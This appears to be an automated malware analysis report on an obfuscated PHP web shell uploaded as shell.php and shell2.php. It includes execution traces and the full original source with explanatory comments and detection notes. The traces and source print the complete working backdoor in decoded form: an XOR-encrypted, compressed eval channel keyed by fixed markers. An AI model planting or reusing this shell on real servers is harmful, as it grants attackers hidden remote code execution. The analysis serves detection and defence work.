PHP Malware Analysis

shell.php, shell2.php

md5: f171a517b6436d99508738ed40fc4c83



Deobfuscated PHP code

Failed to deobfuscate code

Execution traces

data/traces/f171a517b6436d99508738ed40fc4c83_trace-1676242958.0096.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:03:03.907388]
1	0	1	0.000170	393512
1	3	0	0.000236	396664	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000253	396664	str_replace	0		/var/www/html/uploads/shell.php	2	3	'DI'	''	'creDIatDIe_DIfuDIDIDInction'
2	4	1	0.000273	396800
2	4	R			'create_function'
1		A						/var/www/html/uploads/shell.php	2	$M = 'create_function'
1		A						/var/www/html/uploads/shell.php	3	$h = 'e6TI4_TIencode(@TIx(@gzTIcTIompress(TI$o),$k));TIpTIrint("$p$TIkh$r$kf");}'
1		A						/var/www/html/uploads/shell.php	4	$Z = '$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTI'
1		A						/var/www/html/uploads/shell.php	5	$T = 'h("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,'
1		A						/var/www/html/uploads/shell.php	6	$f = 'TIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$'
1		A						/var/www/html/uploads/shell.php	7	$w = 'jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatc'
1		A						/var/www/html/uploads/shell.php	8	$u = '8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTIt'
1		A						/var/www/html/uploads/shell.php	9	$A = 'e($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r=TI@bas'
1		A						/var/www/html/uploads/shell.php	10	$n = '$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"'
2	5	0	0.000436	397344	str_replace	0		/var/www/html/uploads/shell.php	11	3	'TI'	''	'$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTItTIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatch("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTIe($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r'
2	5	1	0.000511	397952
2	5	R			'$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/shell.php	11	$m = '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000570	397216	create_function	0		/var/www/html/uploads/shell.php	12	2	''	'$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000654	405256	{internal eval}	1		/var/www/html/uploads/shell.php	12	0
3	7	1	0.000669	405256
3	7	R			NULL
2	6	1	0.000684	403888
2	6	R			'\000lambda_9'
1		A						/var/www/html/uploads/shell.php	12	$i = '\000lambda_9'
2	8	0	0.000712	403824	__lambda_func	1		/var/www/html/uploads/shell.php	12	0
2		A						/var/www/html/uploads/shell.php(12) : runtime-created function	1	$k = '5e93de3e'
2		A						/var/www/html/uploads/shell.php(12) : runtime-created function	1	$kh = 'fa544e85dcd6'
2		A						/var/www/html/uploads/shell.php(12) : runtime-created function	1	$kf = '311732d28f95'
2		A						/var/www/html/uploads/shell.php(12) : runtime-created function	1	$p = '8kaf9SjZFWu4j9vT'
3	9	0	0.000776	403880	file_get_contents	0		/var/www/html/uploads/shell.php(12) : runtime-created function	1	1	'php://input'
3	9	1	0.000799	404616
3	9	R			''
3	10	0	0.000812	404600	preg_match	0		/var/www/html/uploads/shell.php(12) : runtime-created function	1	3	'/fa544e85dcd6(.+)311732d28f95/'	''	NULL
3	10	1	0.000877	404760
3	10	R			0
2	8	1	0.000893	404520
1	3	1	0.000900	404520
			0.000928	321832
TRACE END   [2023-02-12 21:03:03.908180]

data/traces/f171a517b6436d99508738ed40fc4c83_trace-1676257008.1009.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:57:13.998789]
1	0	1	0.000256	393528
1	3	0	0.000342	396688	{main}	1		/var/www/html/uploads/shell2.php	0	0
2	4	0	0.000363	396688	str_replace	0		/var/www/html/uploads/shell2.php	2	3	'DI'	''	'creDIatDIe_DIfuDIDIDInction'
2	4	1	0.000389	396824
2	4	R			'create_function'
1		A						/var/www/html/uploads/shell2.php	2	$M = 'create_function'
1		A						/var/www/html/uploads/shell2.php	3	$h = 'e6TI4_TIencode(@TIx(@gzTIcTIompress(TI$o),$k));TIpTIrint("$p$TIkh$r$kf");}'
1		A						/var/www/html/uploads/shell2.php	4	$Z = '$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTI'
1		A						/var/www/html/uploads/shell2.php	5	$T = 'h("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,'
1		A						/var/www/html/uploads/shell2.php	6	$f = 'TIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$'
1		A						/var/www/html/uploads/shell2.php	7	$w = 'jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatc'
1		A						/var/www/html/uploads/shell2.php	8	$u = '8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTIt'
1		A						/var/www/html/uploads/shell2.php	9	$A = 'e($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r=TI@bas'
1		A						/var/www/html/uploads/shell2.php	10	$n = '$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"'
2	5	0	0.000585	397368	str_replace	0		/var/www/html/uploads/shell2.php	11	3	'TI'	''	'$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTItTIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatch("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTIe($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r'
2	5	1	0.000633	397976
2	5	R			'$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/shell2.php	11	$m = '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000711	397240	create_function	0		/var/www/html/uploads/shell2.php	12	2	''	'$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000818	405280	{internal eval}	1		/var/www/html/uploads/shell2.php	12	0
3	7	1	0.000837	405280
3	7	R			NULL
2	6	1	0.000858	403912
2	6	R			'\000lambda_2'
1		A						/var/www/html/uploads/shell2.php	12	$i = '\000lambda_2'
2	8	0	0.000896	403848	__lambda_func	1		/var/www/html/uploads/shell2.php	12	0
2		A						/var/www/html/uploads/shell2.php(12) : runtime-created function	1	$k = '5e93de3e'
2		A						/var/www/html/uploads/shell2.php(12) : runtime-created function	1	$kh = 'fa544e85dcd6'
2		A						/var/www/html/uploads/shell2.php(12) : runtime-created function	1	$kf = '311732d28f95'
2		A						/var/www/html/uploads/shell2.php(12) : runtime-created function	1	$p = '8kaf9SjZFWu4j9vT'
3	9	0	0.000980	403904	file_get_contents	0		/var/www/html/uploads/shell2.php(12) : runtime-created function	1	1	'php://input'
3	9	1	0.001009	404640
3	9	R			''
3	10	0	0.001028	404624	preg_match	0		/var/www/html/uploads/shell2.php(12) : runtime-created function	1	3	'/fa544e85dcd6(.+)311732d28f95/'	''	NULL
3	10	1	0.001100	404784
3	10	R			0
2	8	1	0.001120	404544
1	3	1	0.001137	404544
			0.001240	321848
TRACE END   [2023-02-13 00:57:13.999825]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Two-stage obfuscated loader: the real payload is assembled from string
// fragments at runtime and executed through create_function(). There is no
// legitimate functionality in this file; it is a remote-command web shell.
//
// Stage 1: removing every 'DI' from 'creDIatDIe_DIfuDIDIDInction' yields the
// string 'create_function' (see the first str_replace in the trace), so $M
// holds a callable name without the function name appearing in the source.
$M=str_replace('DI','','creDIatDIe_DIfuDIDIDInction');
// Stage 2: eight fragments of the payload, assigned out of their logical
// order and padded with the junk token 'TI' so that no API name survives a
// plain grep over the file.
$h='e6TI4_TIencode(@TIx(@gzTIcTIompress(TI$o),$k));TIpTIrint("$p$TIkh$r$kf");}';
$Z='$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTI';
$T='h("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,';
$f='TIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$';
$w='jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatc';
$u='8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTIt';
$A='e($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r=TI@bas';
$n='$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"';
// The fragments are concatenated in the order $n,$u,$f,$w,$T,$Z,$A,$h and
// stripped of 'TI'. The resulting source (shown decoded in the trace as the
// second str_replace result) does the following:
//   - hard-codes an XOR key $k and two fixed hex markers $kh and $kf;
//   - defines x($t,$k), a repeating-key XOR over the bytes of $t;
//   - reads the raw request body from php://input and matches it against
//     /$kh(.+)$kf/, i.e. data framed by the two markers;
//   - base64-decodes the framed data, XORs it with $k, gzuncompress()es it
//     and hands the result to eval() with output buffering enabled;
//   - returns the captured output gzcompress()ed, XOR-ed with the same key
//     and base64-encoded, framed as "$p$kh...$kf", so the response channel
//     is obfuscated as well.
// Every call in the payload is @-suppressed, so a malformed or absent body
// leaves nothing in the error log (the trace shows preg_match returning 0
// on an empty body and the script exiting silently).
$m=str_replace('TI','',$n.$u.$f.$w.$T.$Z.$A.$h);
// create_function('', $m) compiles $m as an anonymous function (the trace
// shows the returned name "\0lambda_N") and the immediate call executes it.
// Detection/mitigation notes: create_function() and the $t{$i} string-offset
// syntax used in the payload were both removed in PHP 8.0, so this sample
// only runs on PHP 7.x or older; the fixed markers fa544e85dcd6 / 311732d28f95
// in request bodies and the constant response prefix 8kaf9SjZFWu4j9vT are
// stable strings for WAF or log rules, and the file hash on this page
// identifies both uploaded copies (shell.php, shell2.php).
$i=$M('',$m);$i();
?>